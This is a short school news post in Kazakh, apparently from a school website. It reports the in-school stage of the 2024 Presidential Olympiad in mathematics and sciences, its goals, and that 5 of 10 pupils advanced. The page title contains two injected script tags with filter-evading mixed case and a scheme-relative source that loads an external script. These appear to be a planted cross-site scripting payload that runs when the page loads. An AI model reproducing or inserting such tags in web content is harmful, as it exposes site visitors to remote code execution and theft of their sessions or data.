Президенттік олимпиада - 2024<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

18.09.2024

Қазақстан Республикасы Білім және ғылым министрінің 2012 жылғы 13 наурыздағы № 99 бұйрығына сәйкес Жаратылыстану-математика циклы пәндері бойынша Президенттік олимпиаданың мектепішілік басқышы өткізілді.

      Президенттік олимпиада Қазақстан Республикасы Білім және ғылым министрлігі өткізетін жыл сайынғы іс-шара болып табылады.

     Президенттік олимпиаданың мақсаттары мен міндеттері:

      1) орта білім беру ұйымдарының оқушылары арасында математика, физика, химия және биологиядан дарынды оқушыларды анықтау үшін кәсіптік бағдар мен болашақтағы интеллектуалдық дамуына қолайлы жағдай жасау;

      2) жаратылыстану-математикалық бағыттағы пәндерді оқутуда оқушылардың қызығушылығын арттыру, теориялық білімдері мен дағдыларын тереңдету;

      3) тұлғаның өзін-өзі жетілдіруіне және дамытуына жағдай жасау.

      Аталмыш олимпиада мектебімізде 16 қыркүйек күні болып өтті. Президенттік олимпиадаға 10 оқушы қатысып, аудандық кезеңге 5 оқушы өтті.

 

Просмотров: 248


Пікір қосу



Деректерді қолтаңбаға қосу